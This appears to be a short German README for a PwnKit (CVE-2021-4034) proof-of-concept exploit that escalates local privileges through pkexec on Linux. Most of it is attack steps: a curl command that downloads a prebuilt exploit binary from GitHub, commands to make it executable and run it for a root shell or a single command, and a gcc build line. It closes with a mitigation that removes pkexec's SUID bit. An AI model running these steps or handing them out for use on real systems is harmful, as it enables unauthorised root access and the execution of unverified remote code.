
Proof-of-Concept-Exploit für CVE-2021-4034 (PwnKit), der die pkexec-SUID-Binärdatei ausnutzt, um lokale Privilegieneskalation auf Linux-Systemen zu erreichen. Enthält manuelle Ausführungs- und Build-Anweisungen.
PoC für PwnKit / CVE-2021-4034 - Pkexec Lokale Privilegienausweitung
curl -fsSL https://raw.githubusercontent.com/jayhutajulu1/PwnKit-CVE-2021-4034/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
Das Ausführen des Exploits gegen gepatchte Versionen führt zur folgenden Ausgabe.
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
Falls für Ihr Betriebssystem keine Patches verfügbar sind, können Sie als vorübergehende Abschwächung das SUID-Bit von pkexec entfernen.
# chmod 0755 /usr/bin/pkexec